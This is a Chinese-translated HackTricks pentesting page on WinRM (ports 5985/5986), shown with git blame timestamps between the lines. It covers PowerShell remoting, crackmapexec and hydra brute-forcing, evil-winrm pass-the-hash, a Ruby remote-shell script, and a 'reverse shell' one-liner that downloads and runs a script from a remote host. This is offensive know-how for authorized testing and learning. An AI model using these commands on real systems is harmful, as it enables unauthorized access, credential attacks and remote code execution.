hacktricks/network-services-pentesting/5985-5986-pentesting-winrm.md

326 lines
14 KiB
Markdown
Raw Normal View History

# 5985,5986 - 渗透测试 WinRM
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
2022-04-28 16:01:33 +00:00
支持 HackTricks 的其他方式:
2022-04-28 16:01:33 +00:00
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** 上**关注我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
</details>
2022-10-27 23:22:18 +00:00
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-02-27 09:28:45 +00:00
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
2023-02-27 09:28:45 +00:00
**黑客见解**\
参与深入探讨黑客的刺激和挑战的内容
2023-02-27 09:28:45 +00:00
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
2023-07-14 15:03:41 +00:00
**最新公告**\
随时了解最新的赏金计划发布和重要平台更新
2023-07-14 15:03:41 +00:00
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),立即与顶尖黑客合作!
2022-10-27 23:22:18 +00:00
2022-07-28 09:46:19 +00:00
## WinRM
[Windows 远程管理WinRM](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) 是微软强调的一种**协议**,通过 HTTP(S) 实现对 Windows 系统的**远程管理**,在此过程中利用 SOAP。它基本上由 WMI 提供支持,作为 WMI 操作的基于 HTTP 的接口。
机器上存在 WinRM 允许通过 PowerShell 进行简单的远程管理,类似于 SSH 在其他操作系统上的工作方式。要确定 WinRM 是否可用,建议检查特定端口是否已打开:
2023-08-03 19:12:22 +00:00
* **5985/tcpHTTP**
* **5986/tcpHTTPS**
上述列表中的开放端口表示已设置 WinRM因此允许尝试启动远程会话。
### **启动 WinRM 会话**
要为 WinRM 配置 PowerShell需要使用微软的 `Enable-PSRemoting` 命令,设置计算机以接受远程 PowerShell 命令。通过提升的 PowerShell 访问权限,可以执行以下命令以启用此功能并将任何主机指定为受信任的:
```powershell
2023-08-03 19:12:22 +00:00
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
```
这种方法涉及向`trustedhosts`配置添加通配符,这一步骤需要谨慎考虑,因为它可能带来一些影响。还需要注意,可能需要将攻击者的机器上的网络类型从"Public"更改为"Work"。
此外WinRM可以使用`wmic`命令**远程激活**,演示如下:
```powershell
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```
### 测试配置
要验证攻击机器的设置,使用`Test-WSMan`命令来检查目标是否正确配置了WinRM。通过执行此命令您应该期望收到有关协议版本和wsmid的详细信息表明配置成功。以下是演示已配置目标与未配置目标的预期输出示例
- 对于已正确配置的目标,输出将类似于:
```bash
Test-WSMan <target-ip>
```
2023-08-03 19:12:22 +00:00
### 执行命令
要在目标机器上远程执行`ipconfig`并查看其输出,请执行:
```powershell
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
2022-07-28 09:46:19 +00:00
![](<../.gitbook/assets/image (163) (1).png>)
您还可以通过**Invoke-Command**执行当前PS控制台的命令。假设您本地有一个名为**enumeration**的函数,并且您想在远程计算机上执行它,您可以执行以下操作:
```powershell
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```
2023-08-03 19:12:22 +00:00
### 执行脚本
```powershell
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
```
2023-08-03 19:12:22 +00:00
### 获取反向Shell
```powershell
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
### 获取一个 PS 会话
要获取一个交互式 PowerShell shell请使用 `Enter-PSSession`
2022-09-26 12:02:10 +00:00
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
2022-10-30 16:20:17 +00:00
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
2023-08-03 19:12:22 +00:00
# Save session in var
2022-10-30 16:20:17 +00:00
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
```
![](<../.gitbook/assets/image (164).png>)
**会话将在“受害者”内部的新进程wsmprovhost中运行**
### **强制打开 WinRM**
要使用 PS 远程和 WinRM但计算机未配置您可以使用以下命令启用它
```powershell
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```
2023-08-03 19:12:22 +00:00
### 保存和恢复会话
如果远程计算机中的语言受限,则**无法工作**。
```powershell
2022-09-26 12:02:10 +00:00
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
#You can save a session inside a variable
2022-09-25 22:00:52 +00:00
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
在这些会话中您可以使用_Invoke-Command_加载PS脚本。
```powershell
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
2023-08-03 19:12:22 +00:00
### 错误
2023-08-03 19:12:22 +00:00
如果你遇到以下错误:
`enter-pssession : 连接到远程服务器 10.10.10.175 失败错误消息如下WinRM 客户端无法处理请求。如果身份验证方案与 Kerberos 不同,或者客户端计算机未加入域,则必须使用 HTTPS 传输,或将目标计算机添加到 TrustedHosts 配置设置中。使用 winrm.cmd 来配置 TrustedHosts。请注意TrustedHosts 列表中的计算机可能未经过身份验证。您可以通过运行以下命令获取有关此信息的更多信息winrm help config。有关更多信息请参阅 about_Remote_Troubleshooting 帮助主题。`
然后在客户端尝试(信息来自[这里](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)
```ruby
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-07-14 15:03:41 +00:00
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
2023-02-27 09:28:45 +00:00
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
2023-02-27 09:28:45 +00:00
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
2022-10-27 23:22:18 +00:00
**最新公告**\
了解最新的赏金任务发布和重要平台更新
2023-02-27 09:28:45 +00:00
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
2023-07-14 15:03:41 +00:00
## 在Linux中建立WinRM连接
2020-09-20 21:44:41 +00:00
2023-08-03 19:12:22 +00:00
### 暴力破解
2020-09-20 21:41:33 +00:00
请注意暴力破解WinRM可能会导致用户被阻止。
2020-09-20 21:41:33 +00:00
```ruby
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Just check a pair of credentials
2022-05-01 12:49:36 +00:00
# Username + Password + CMD command execution
2020-09-20 21:44:41 +00:00
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
2022-05-01 12:49:36 +00:00
# Username + Hash + PS command execution
2020-09-20 21:44:41 +00:00
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
2020-09-20 21:41:33 +00:00
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
```
2023-08-03 19:12:22 +00:00
### 使用 evil-winrm
```ruby
2023-08-03 19:12:22 +00:00
gem install evil-winrm
```
阅读其 **文档** 在其 github 上: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
2023-08-03 19:12:22 +00:00
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
```
要使用 evil-winrm 连接到一个 IPv6 地址,在 /etc/hosts 中创建一个条目,将一个域名设置为该 IPv6 地址,并连接到该域名。
### 使用 evil-winrm 传递哈希
2023-08-03 19:12:22 +00:00
```ruby
evil-winrm -u <username> -H <Hash> -i <IP>
```
### 使用PS-docker机器
![](<../.gitbook/assets/image (173).png>)
```
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
```
### 使用ruby脚本
**代码提取自这里:[https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)**
```ruby
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/
2023-08-03 19:12:22 +00:00
conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
)
class String
2023-08-03 19:12:22 +00:00
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end
command=""
file_manager = WinRM::FS::FileManager.new(conn)
conn.shell(:powershell) do |shell|
2023-08-03 19:12:22 +00:00
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end
```
2022-07-28 09:46:19 +00:00
## Shodan
2020-10-05 21:51:08 +00:00
* `port:5985 Microsoft-HTTPAPI`
## References
2022-10-27 23:22:18 +00:00
* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
2023-08-03 19:12:22 +00:00
## HackTricks 自动命令
```
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out
2021-08-15 17:09:57 +00:00
Entry_1:
2023-08-03 19:12:22 +00:00
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
2021-08-15 17:09:57 +00:00
2023-08-03 19:12:22 +00:00
sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p MySuperSecr3tPass123!
2021-08-15 17:09:57 +00:00
2023-08-03 19:12:22 +00:00
https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
2021-08-15 17:09:57 +00:00
2023-08-03 19:12:22 +00:00
ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory or -s to upload scripts (sherlock)
menu
invoke-binary `tab`
2021-08-15 17:09:57 +00:00
2023-08-03 19:12:22 +00:00
#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))
2021-08-15 17:09:57 +00:00
2023-08-03 19:12:22 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-winrm
2021-09-13 15:49:25 +00:00
Entry_2:
2023-08-03 19:12:22 +00:00
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
```
2023-07-14 15:03:41 +00:00
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-07-14 15:03:41 +00:00
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
2023-02-27 09:28:45 +00:00
**黑客见解**\
参与深入探讨黑客的刺激和挑战的内容
2022-10-27 23:22:18 +00:00
**实时黑客新闻**\
通过实时新闻和见解,了解快节奏的黑客世界
2023-02-27 09:28:45 +00:00
**最新公告**\
了解最新的赏金任务发布和重要平台更新
2023-02-27 09:28:45 +00:00
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
2022-10-27 23:22:18 +00:00
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
2022-04-28 16:01:33 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
</details>